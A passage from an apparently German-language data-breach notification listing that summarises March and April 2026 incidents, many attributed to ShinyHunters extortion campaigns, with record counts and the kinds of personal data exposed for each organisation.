| Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations, Support tickets In April 2026, Canada Life was the victim of a "pay or leak" extortion campaign by the ShinyHunters group. The group subsequently published the data which contained over 200k unique email addresses along with names, phone numbers, physical addresses and, in some cases, customer support tickets. In their disclosure notice, Canada Life advised that "it is a small proportion of our customers who may have been impacted". In the wake of the incident, Canada Life also published an alert cautioning customers to be wary of phishing attacks, a pattern often seen after the public release of breached data. |
||
| 20.04.2026 - Pitney Bowes | 8.243.989 Datensätze geleaked | |
| Email addresses, Job titles, Names, Phone numbers, Physical addresses In April 2026, the hacking collective ShinyHunters claimed to have obtained data from Pitney Bowes as part of a broader extortion campaign that also named several other organisations. After negotiations allegedly failed, the group publicly released the data which included 8.2M unique email addresses, along with names, phone numbers and physical addresses. A subset of the data also included Pitney Bowes employee records with job titles. |
||
| 18.04.2026 - Carnival | 7.531.359 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Geographic locations, Loyalty program details, Names, Salutations In April 2026, the notorious hacking collective ShinyHunters claimed they had obtained a substantial volume of data belonging to the Carnival cruise operator and attempted to extort the organisation to prevent the data from being leaked. The following week, the group published the data publicly, which contained 8.7M records with 7.5M unique email addresses. The data contained fields indicating it related to the Mariner Society loyalty program run by Holland America, a cruise line brand under Carnival, and included names, dates of birth, genders and data relating to status within the loyalty program. Carnival acknowledged a phishing incident involving a single user account and advised they were working to better understand the scope of the unauthorised activity. |
||
| 15.04.2026 - Kemper | 269.299 Datensätze geleaked | |
| Email addresses, Names, Partial credit card data, Phone numbers, Physical addresses, Purchases In April 2026, the American insurance holding company Kemper Corporation was named by the ShinyHunters ransomware group in a "pay or leak" extortion campaign. The attackers allegedly accessed Kemper's Salesforce environment via social engineering as part of a broader campaign targeting hundreds of organisations using the same method. The group later published tens of gigabytes of data they claimed included internal directory data, Salesforce records and Stripe payment logs. Among the 269k unique email addresses were names, phone numbers, physical addresses and partial payment card data including the last 4 digits, expiry dates and card brands. Kemper confirmed the incident and stated they had engaged third-party cybersecurity experts and notified law enforcement. |
||
| 15.04.2026 - Zara | 197.376 Datensätze geleaked | |
| Email addresses, Geographic locations, Purchases, Support tickets In April 2026, the fashion brand Zara was among a number of organisations targeted by the ShinyHunters extortion group as part of their "pay or leak" campaign. The group claimed the breach was related to a compromise of the Anodot analytics platform and subsequently published a terabyte of data allegedly including 95M support ticket records. The data contained 197k unique email addresses alongside product SKUs, order IDs and the market the support ticket originated in. Zara's parent company Inditex advised that the incident didn't affect passwords or payment information. |
||
| 14.04.2026 - Abrigo | 711.099 Datensätze geleaked | |
| Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses In April 2026, the fintech software company Abrigo was targeted in a "pay or leak" extortion attempt by the ShinyHunters group. Shortly after, data allegedly taken from the company's Salesforce instance was published publicly and contained over 700k unique email addresses belonging to both Abrigo staff and external contacts. Whilst separate from Abrigo's Salesforce compromise via the Drift application connector the previous year, the data fields described in that incident are consistent with the ShinyHunters data, namely that it was "business contact information" including "institution name, employee name, email addresses, and phone numbers". |
||
| 12.04.2026 - Marcus & Millichap | 1.837.078 Datensätze geleaked | |
| Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses In April 2026, the commercial real estate brokerage firm Marcus & Millichap was named as one of multiple alleged victims of the ShinyHunters hacking and extortion group. Data alleged to have been obtained from the company was subsequently released publicly and included 1.8M unique email addresses, along with names, phone numbers and employment-related information including employer, job title and physical company address. In their disclosure notice, Marcus & Millichap advised that data which may have been accessed appeared limited to "company forms, templates, marketing materials, and general contact information". |
||
| 12.04.2026 - Mytheresa | 84.108 Datensätze geleaked | |
| Email addresses, Names, Partial credit card data, Phone numbers, Physical addresses, Purchases, Salutations In April 2026, the luxury fashion e-commerce platform Mytheresa was listed as a victim of the ShinyHunters "pay or leak" extortion group. After the ransom deadline passed, the group publicly released the data which contained 84k unique email addresses. The exposed data also included names, phone numbers, physical addresses, purchases and partial credit card data including card type, last 4 digits and expiry date. |
||
| 10.04.2026 - McGraw Hill | 13.500.136 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses In April 2026, education company McGraw Hill confirmed a data breach following an extortion attempt. Attributed to a Salesforce misconfiguration, the company stated the incident exposed "a limited set of data from a webpage hosted by Salesforce on its platform". More than 100GB of data was later publicly distributed, containing 13.5M unique email addresses across multiple files, with additional fields such as name, physical address and phone number appearing inconsistently across some records. |
||
| 08.04.2026 - 7-Eleven | 185.256 Datensätze geleaked | |
| Dates of birth, Email addresses, Names, Phone numbers, Physical addresses In April 2026, 7-Eleven was the victim of a "pay or leak" extortion campaign by ShinyHunters, with the data later published that month. The incident exposed 185k unique email addresses, along with names, physical addresses, dates of birth and phone numbers. A small number of records also contained additional exposed data fields. The company later advised the breach was limited to "certain 7-Eleven systems used to store franchisee documents", a statement consistent with the exposed data. |
||
| 07.04.2026 - My Lovely AI | 106.271 Datensätze geleaked | |
| Email addresses, Social media profiles In April 2026, the NSFW AI girlfriend platform My Lovely AI suffered a data breach that exposed over 100k users. The data included user-created prompts and links to the resulting AI-generated images, along with a small number of Discord and X usernames. |
||
| 06.04.2026 - LegionProxy | 10.144 Datensätze geleaked | |
| Email addresses, Names, Passwords, Purchases In April 2026, the commercial residential and ISP proxy network LegionProxy suffered a data breach. The incident exposed 10k email addresses, bcrypt password hashes, names and purchases. |
||
| 03.04.2026 - Amtrak | 2.147.679 Datensätze geleaked | |
| Email addresses, Names, Physical addresses, Support tickets In April 2026, the hacking group ShinyHunters claimed they had breached Amtrak. The group typically compromises organisations' Salesforce instances before demanding a ransom and later, if not paid, dumping the data publicly. They subsequently published the alleged data which contained over 2M unique email addresses along with names, physical addresses and customer support records. |
||
| 02.04.2026 - SongTrivia2 | 291.739 Datensätze geleaked | |
| Auth tokens, Avatars, Email addresses, Names, Passwords, Usernames In April 2026, the music trivia platform SongTrivia2 suffered a data breach that was subsequently published to a public hacking forum. The data contained a total of 291k unique email addresses sourced from either Google OAuth logins or accounts created on the site, the latter also containing bcrypt password hashes. The data also included names, usernames and avatars. |
||
| 31.03.2026 - Hallmark | 1.736.520 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses, Support tickets In March 2026, Hallmark suffered an alleged breach and subsequent extortion after attackers gained access to data stored within Salesforce. The data was later published after the extortion deadline passed, exposing 1.7M unique email addresses across both Hallmark and the Hallmark+ streaming service, along with names, phone numbers, physical addresses and support tickets. |
||
| 27.03.2026 - ZenBusiness | 5.118.184 Datensätze geleaked | |
| Email addresses, Names, Phone numbers In March 2026, the hacker and extortion group "ShinyHunters" claimed to have obtained a substantial corpus of data from ZenBusiness, a business formation and compliance platform. The group claimed the data had been exfiltrated from platforms including Snowflake, Mixpanel and Salesforce, and threatened to publish it if a ransom was not paid. The following month, after claiming payment had not been made, ShinyHunters publicly released the data. The collection amounted to many terabytes across thousands of files that appeared to originate from multiple systems and business functions, including leads, support records and other CRM-related data. The data contained approximately 5M unique email addresses, often accompanied by name and phone number depending on the source file. |
||
| 26.03.2026 - BreachForums Version 5 | 339.778 Datensätze geleaked | |
| Email addresses, Passwords, Usernames In March 2026, a breach of one of the many iterations of the BreachForums hacking forum known as "Version 5" was publicly disclosed. The incident exposed 340k unique email addresses along with usernames and argon2 password hashes. |
||
| 25.03.2026 - Addi | 34.532.941 Datensätze geleaked | |
| Age groups, Credit scores, Device information, Email addresses, Government issued IDs, Income levels, IP addresses, Latitude and longitude pairs, Names, Phone numbers, Physical addresses, Purchases, Socioeconomic levels In March 2026, the Colombian fintech company Addi identified unauthorised activity on its platform and advised customers that "it is possible that your personal information may have been compromised". The "pay or leak" extortion group ShinyHunters subsequently claimed responsibility and published a large trove of personal data allegedly obtained from Addi. The data included 34M unique email addresses from credit scoring requests, credit bureau records, customer identity records and email validation logs. It also contained government issued IDs (Cédula de Ciudadanía), estimated income, socioeconomic levels, purchases and other credit-related data points. |
||
| 25.03.2026 - Sound Radix | 292.993 Datensätze geleaked | |
| Email addresses, Names, Passwords In March 2026, the audio production tools company Sound Radix disclosed a data breach that they subsequently self-submitted to HIBP. The incident impacted 293k unique email addresses and names. Sound Radix advised that it is possible that additional data including hashed passwords may have been exposed, and that no financial or credit card information was impacted. |
||
| 19.03.2026 - Berkadia | 305.216 Datensätze geleaked | |
| Email addresses, Employers, Names, Phone numbers, Physical addresses In March 2026, the commercial real estate finance company Berkadia was the target of a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data they alleged was taken from Berkadia's Salesforce instance, including over 300k unique email addresses as well as names, physical addresses and phone numbers, among other data. |
||
| 18.03.2026 - Infinite Campus | 137.123 Datensätze geleaked | |
| Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses, Support tickets, Usernames In March 2026, the student information system Infinite Campus was targeted in a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data they alleged was taken from Infinite Campus, containing 137k unique email addresses along with names, phone numbers, physical addresses and support tickets. Infinite Campus subsequently sent notifications, advising that the exposed data largely consisted of "names and contact information for school staff" and that "the majority is directory information commonly found on school websites". |
||
| 13.03.2026 - Divine Skins | 105.814 Datensätze geleaked | |
| Email addresses, Purchases, Usernames In March 2026, the League of Legends custom skins service Divine Skins suffered a data breach. The incident was disclosed via the service's Discord server, where Divine Skins stated that an unauthorised third party accessed part of its systems, deleted all skins from the database and exposed email addresses and usernames. The data also contained a history of purchases made by users. |
||
| 12.03.2026 - Crunchyroll | 1.195.684 Datensätze geleaked | |
| Email addresses In March 2026, the anime streaming service Crunchyroll suffered a data breach alleged to have impacted 6.8M users. The exposed data is reported to have originated from the company's Zendesk support system where "name, login name, email address, IP address, general geographic location and the contents of the support tickets" were exposed. A subset of 1.2M email addresses from an alleged 2M record dataset being sold was later provided to HIBP. |
||
| 08.03.2026 - Baydöner | 1.266.822 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Geographic locations, Government issued IDs, Names, Passwords, Phone numbers, Purchases In March 2026, the Turkish restaurant chain Baydöner suffered a data breach which was subsequently published to a public hacking forum. The incident exposed over 1.2M unique email addresses along with names, phone numbers, cities of residence and plaintext passwords. A small number of records also included Turkish national ID number and date of birth. In their disclosure notice, Baydöner stated that payment and financial data was not affected. |
||
| 06.03.2026 - Aura | 903.080 Datensätze geleaked | |
| Customer service comments, Email addresses, IP addresses, Names, Phone numbers, Physical addresses In March 2026, the online safety service Aura disclosed a data breach that exposed 900k unique email addresses. The data was primarily associated with a marketing tool from a previously acquired company, with fewer than 20k active Aura customers affected. Exposed data included names, phone numbers, physical and IP addresses, and customer service notes. Aura advised that no Social Security numbers, passwords or financial information were compromised. |
||
| 04.03.2026 - SUCCESS | 253.510 Datensätze geleaked | |
| Device information, Email addresses, IP addresses, Names, Passwords, Phone numbers, Physical addresses, Purchases In March 2026, the personal development and achievement media brand SUCCESS suffered a data breach. The incident exposed 250k unique email addresses along with names, IP addresses, phone numbers and, for a limited number of staff members, bcrypt password hashes. The data also included orders containing physical addresses and the payment method used. In SUCCESS' disclosure notice, they advised their system had also been abused to send offensive newsletters with quotes falsely attributed to contributors. |
||